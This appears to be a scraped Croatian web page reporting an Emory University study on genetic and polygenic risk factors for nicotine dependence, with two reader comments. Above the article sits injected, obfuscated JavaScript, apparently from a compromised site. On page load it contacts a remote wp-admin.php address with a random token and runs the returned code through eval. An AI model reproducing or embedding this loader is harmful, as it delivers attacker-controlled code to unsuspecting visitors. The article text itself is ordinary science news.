;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Studija istražuje genetske čimbenike povezane s ovisnošću o nikotinu

Nova studija koju su vodili psiholozi sa Sveučilišta Emory objavljena na Nicotine & Tobacco Research nudi novi model za analizu genetskog rizika povezanog s ovisnošću o nikotinu. 

Poligenetski rezultati za različite osobine i poremećaje kao što su rizik od depresije i neuroticizma, povećali su rizik za tu ovisnost. 

S obzirom na to da neki ljudi neko vrijeme mogu ležerno pušiti i čini se da nikad ne razviju ovisnost, dok se drugi godinama bore s prestankom pušenja, očito je da mješavina okolišnih, bihevioralnih i genetskih čimbenika doprinosi ovisnosti o nikotinu. 

Pod nazivom “Multi-poligenska analiza ovisnosti o nikotinu kod pojedinaca europskog porijekla”, trenutna studija koristila je model s više osobina s ciljem genetske korelacije osobina i bolesti kako bi se povećala točnost predviđanja nečije ovisnosti o nikotinu. 

Geni koji povećavaju rizik od ovisnosti 

Rezultati su pokazali da različite osobine i poremećaji kao što su rizik od shizofrenije, depresije, neuroticizma, dobrovoljnog preuzimanja rizika, visokog indeksa tjelesne mase i alkoholizma povećavaju rizik za ovisnost o nikotinu. S druge strane, drugi poligenetski rezultati, poput onih povezanih s visokim obrazovanjem, smanjili su rizik od ovisnosti o nikotinu. 

Zanimljivo je da je studija izvijestila da su broj popušenih cigareta dnevno, dobrovoljno preuzimanje rizika i obrazovna postignuća bili najjači prediktori. “Ako pogledate zajednički učinak svih ovih karakteristika, naš model čini gotovo 4 posto varijacija u ovisnosti o nikotinu, ili gotovo četiri puta više od onoga što naučimo oslanjajući se isključivo na genetski indeks za broj cigareta netko svakodnevno puši”, rekao je Rohan Palmer, viši autor i docent na Laboratoriju za bihevioralnu genetiku ovisnosti na Sveučilištu Emory. 

Palmer je dodao da se situacija čini složenijom nego što se mislilo. “Ono što otkrivamo jest da, kako bismo bolje iskoristili genetske informacije, moramo ići dalje od individualnih ljudskih osobina i poremećaja i razmišljati o tome kako su rizici za različita ponašanja i osobine međusobno povezani. Ovaj širi pristup može nam dati puno bolju mjeru za to je li netko u opasnosti od mentalnog poremećaja, kao što je ovisnost o nikotinu.” 

“Sve osobine i bolesti koje smo promatrali su poligene, uključuju više gena”, dodaje Victoria Risner, prva autorica studije, koja je to radila kao Emoryjeva preddiplomska studija neuroznanosti i bihevioralne biologije. “To znači da milijuni genetskih varijanti vjerojatno ulaze u potpunu sliku svih nasljednih rizika za ovisnost o nikotinu.” 

Nasljednost 

Viševarijantni, poligenetski model korišten u ovoj studiji nudi priliku i putokaz za buduća istraživanja. Na primjer, daje jasniju sliku o ulozi nasljednosti u ovisnosti koju istraživači mogu dalje proučavati dodavanjem više asocijacija na rizik modelu (kao što je metabolizam nikotina) i skupina poligenskih osobina (kao što je anksioznost zajedno s neuroticizmom). 

“Dok se nastavljamo fokusirati na to tko je najviše izložen riziku da postane ovisan o nikotinu i koji međusobno povezani čimbenici, genetski ili okolišni, mogu povećati njihov rizik, to bi moglo pomoći u određivanju koja bi intervencija mogla biti najbolja za pojedinca”, zaključio je Palmer. 

Tags:
Choose your Reaction!
 • Hm, vele genetske predispozicije? A, kako bi objasnili onda da su moja draga i njezini roditelji, kao i moja mama
  (a i moj stari koji doduše ne puši već godinama te ja do nedavno bili) hard core pušači, dok su mi istovremeno i kćer i sin nepušači?
  Sad bi netko zloban rekao da provjerim jesu li uopće moji, no nema tu brige, oboje su “pljunuti” ja izgledom.
  I unatoč tome što su oboje odrasli u kući punoj duhanskog dima, nikad nisu pokazivali sklonost cigaretama niti bilo kojoj drugoj ovisnosti.
  Dobro je to što se provode istraživanja, no nekako mi to ne ulijeva povjerenje kad na bliskom primjeru vidim kontradikcije.
  Dakako, ima i ona “iznimke potvrđuju pravilo”, no nek oni to još malo bolje istraže ;)

 • Zanimljiva studija, doduše ja bih uzeo u obzir da je to istraživanje tek kap u moru otkrivanja cijelog obrasca ponašanja kod ovisnika o nikotinu.

Leave a Comment